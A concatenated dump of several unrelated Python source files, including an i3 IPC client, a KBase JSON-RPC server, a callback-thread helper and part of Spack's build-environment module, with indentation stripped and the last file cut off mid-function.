"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name]
print "Test Case:"
print " Name: %s" % test_name
print " Path: %s" % test_path
elif format == "json":
print json.dumps(tests, indent=2)
else:
print "Unknown format '%s'" % format
sys.exit(1)
def norm_relative_path(path, start):
"""This function will create a normalized, relative path. It mimics the
python os.path.relpath function, but also normalizes a Windows-syle path
that use backslashes to a Unix style path that uses forward slashes."""
path = os.path.normpath(path)
path = os.path.relpath(path, start)
path = path.replace("\\", "/")
return path
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
options=None, clean=False, notify=None, verbose=False, jobs=1,
macros=None, silent=False, report=None, properties=None,
continue_on_build_fail=False):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
execution_directory = "."
base_path = norm_relative_path(build_path, execution_directory)
target_name = target if isinstance(target, str) else target.name
test_build = {
"platform": target_name,
"toolchain": toolchain_name,
"base_path": base_path,
"baud_rate": 9600,
"binary_type": "bootable",
"tests": {}
}
result = True
map_outputs_total = list()
for test_name, test_path in tests.iteritems():
test_build_path = os.path.join(build_path, test_path)
src_path = base_source_paths + [test_path]
bin_file = None
test_case_folder_name = os.path.basename(test_path)
try:
bin_file = build_project(src_path, test_build_path, target, toolchain_name,
options=options,
jobs=jobs,
clean=clean,
macros=macros,
name=test_case_folder_name,
project_id=test_name,
report=report,
properties=properties,
verbose=verbose)
except Exception, e:
if not isinstance(e, NotSupportedException):
result = False
if continue_on_build_fail:
continue
else:
break
# If a clean build was carried out last time, disable it for the next build.
# Otherwise the previously built test will be deleted.
if clean:
clean = False
# Normalize the path
if bin_file:
bin_file = norm_relative_path(bin_file, execution_directory)
test_build['tests'][test_name] = {
"binaries": [
{
"path": bin_file
}
]
}
print 'Image: %s'% bin_file
test_builds = {}
test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
return {
"builds": test_builds
}
|
pyi3.py | #!/usr/bin/env python3
import threading
import json
import queue
import socket
import struct
import subprocess
__author__ = 'Adaephon'
msgTypes = [
'command',
'get_workspaces',
'subscribe',
'get_outputs',
'get_tree',
'get_marks',
'get_bar_config',
'get_version',
'get_binding_modes',
]
msgTypesMap = {msgTypes[i]: i for i in range(len(msgTypes))}
eventTypes = [
'workspace',
'output',
'mode',
'window',
'barconfig_update',
]
eventTypesMap = {eventTypes[i]: i for i in range(len(eventTypes))}
class Socket:
magicString = b'i3-ipc'
headerPacking = bytes('={}sLL'.format(len(magicString)), 'utf-8')
headerLen = struct.calcsize(headerPacking)
@staticmethod
def get_path():
path = subprocess.check_output(['i3', '--get-socketpath']).rstrip()
return path
def __init__(self, socketPath=None):
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.settimeout(1)
self.socket.connect(socketPath or self.get_path())
def _send(self, msgType, msg=b''):
message = (struct.pack(self.headerPacking, self.magicString,
len(msg), msgType) + msg)
self.socket.sendall(message)
def _receive(self):
header = self.socket.recv(self.headerLen)
_, msgSize, msgType = struct.unpack(self.headerPacking, header)
data = self.socket.recv(msgSize)
return msgType, data
def receive(self):
type_, data = self._receive()
isEvent = type_ >> 31
typeName = (eventTypes[type_ & 0x7f] if isEvent
else msgTypes[type_])
# maybe use data.decode(errors=ignore) -> faulty jetbrains class name
# see http://bugs.i3wm.org/report/ticket/1347
parsedData = json.loads(data.decode())
response = ('event' if isEvent else 'reply',
typeName,
parsedData)
return response
def __getattr__(self, attr):
"""
Provides direct access to all i3 message types and commands
:param attr: name of the message type or command
:return: a function that sends the message and returns the response
"""
# Testing beforehand instead of catching an exception may seem
# un-Pythonic but it is overall faster if the exception would be
# raised quite often.
if attr in msgTypesMap:
msgType = msgTypesMap[attr]
prefix = b""
else:
msgType = msgTypesMap['command']
prefix = attr.encode() + b" "
def func(msg=b''):
self._send(msgType, prefix + msg)
return self.receive()
return func
class I3Base:
def __init__(self, i3socket=None):
self.socket = i3socket or Socket()
class EventHandler(I3Base):
def __init__(self, i3socket=None):
super().__init__(i3socket)
self.events = [0] * len(eventTypes)
self._eventqueue = queue.Queue()
self._subscript_confirmation = queue.Queue()
self.isrunning = threading.Event()
def run(self):
self.isrunning.set()
handler = threading.Thread(target=self._handle_events)
reader = threading.Thread(target=self._read_socket)
def _read_socket(self):
while self.isrunning.is_set():
dataType, name, payload = self.socket.receive()
if dataType == 'event':
self._eventqueue.put((name, payload))
elif name == 'subcribe':
self._subscript_confirmation.put(payload)
else:
raise UnexpectedDataError((dataType, name, payload))
def _handle_events(self):
while self.isrunning.is_set():
type_, payload = self._eventqueue.get()
if type_ == -1:
break
self._handle_event(type_, payload)
def _handle_event(self, type_, payload):
pass
print(type_, payload)
# TODO: something to pause handling (certain) events to avoid recursion
def pause(self, events=None):
pass
class Hook:
def __init__(self, event, change=None, callback=None):
pass
class UnexpectedDataError(Exception):
pass
class Item:
def __init__(self, items):
self.__dict__.update(items)
class WorkspaceHandler(I3Base):
def __init__(self, i3socket=None):
super().__init__(i3socket)
@property
def _workspaces(self):
_, _, wslist = self.socket.get_workspaces()
return map(lambda ws: Item(ws), wslist)
def workspaces(self, visible=None, focused=None, urgent=None,
num=None):
pass
|
kb_staging_exporterServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_staging_exporter.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_staging_exporter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_staging_exporter.kb_staging_exporterImpl import kb_staging_exporter # noqa @IgnorePep8
impl_kb_staging_exporter = kb_staging_exporter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_staging_exporter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_staging_exporter.export_to_staging,
name='kb_staging_exporter.export_to_staging',
types=[dict])
self.method_authentication['kb_staging_exporter.export_to_staging'] = 'required' # noqa
self.rpc_service.add(impl_kb_staging_exporter.status,
name='kb_staging_exporter.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_staging_exporter ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
callback_thread.py | from threading import Thread
from typing import Any, Iterable, Mapping
from types_extensions import Function, void, safe_type
class CallbackThread(Thread):
"""
An extension to python's threading API allowing for a callback to be executed upon completion of the given
function. The callback is executed with the initial function's return value as the first parameter and any other
givent args and kwargs following.
Usage:
>>> def callback_func(x: int, y: int) -> None:
>>>
>>> print(f'Called with {x=} and {y=}.')
>>>
>>> def func(x: int) -> int:
>>> return x + 1
>>> thread_ = CallbackThread(target=func, kwargs={'x': 10}, callback=callback_func, callback_extra_args=(7,))
>>> thread_.start()
>>> thread_.join()
----
Called with x=11 and y=7
"""
def __init__(self, group: void = None, target: Function = None, name: str = None,
args: Iterable[Any] = (), kwargs: Mapping[str, Any] = None, *, daemon: bool = None,
callback: Function = None, callback_extra_args: Iterable[Any] = (),
callback_extra_kwargs: Mapping[str, Any] = None) -> void:
Thread.__init__(self, group=group, target=target, name=name,
args=args, kwargs=kwargs, daemon=daemon)
self._target: Function = target
self._args: Iterable[Any] = args
self._kwargs: safe_type(Mapping[str, Any]) = kwargs or {}
self._callback: Function = callback
self._callback_extra_args: Iterable[Any] = callback_extra_args
self._callback_extra_kwargs: safe_type(Mapping[str, Any]) = callback_extra_kwargs or {}
def run(self) -> void:
if self._target:
return_value = self._target(*self._args, **self._kwargs)
if self._callback:
self._callback(return_value, *self._callback_extra_args, **self._callback_extra_kwargs)
del self._target, self._args, self._kwargs
|
build_environment.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import re
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.package
import spack.schema.environment
import spack.store
import spack.install_test
import spack.architecture as arch
import spack.util.path
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs, inspect_path
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, path_from_modules, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
# On Cray "cluster" systems, unset CRAY_LD_LIBRARY_PATH to avoid
# interference with Spack dependencies.
# CNL requires these variables to be set (or at least some of them,
# depending on the CNL version).
hostarch = arch.Arch(arch.platform(), 'default_os', 'default_target')
on_cray = str(hostarch.platform) == 'cray'
using_cnl = re.match(r'cnl\d+', str(hostarch.os))
if on_cray and not using_cnl:
env.unset('CRAY_LD_LIBRARY_PATH')
for varname in os.environ.keys():
if 'PKGCONF' in varname:
env.unset(varname)
# Unset the following variables because they can affect installation of
# Autotools and CMake packages.
build_system_vars = [
'CC', 'CFLAGS', 'CPP', 'CPPFLAGS', # C variables
'CXX', 'CCC', 'CXXFLAGS', 'CXXCPP', # C++ variables
'F77', 'FFLAGS', 'FLIBS', # Fortran77 variables
'FC', 'FCFLAGS', 'FCLIBS', # Fortran variables
'LDFLAGS', 'LIBS' # linker variables
]
for v in build_system_vars:
env.unset(v)
# Unset mpi environment vars. These flags should only be set by
# mpi providers for packages with mpi dependencies
mpi_vars = [
'MPICC', 'MPICXX', 'MPIFC', 'MPIF77', 'MPIF90'
]
for v in mpi_vars:
env.unset(v)
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Make sure the executables for this compiler exist
compiler.verify_executables()
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
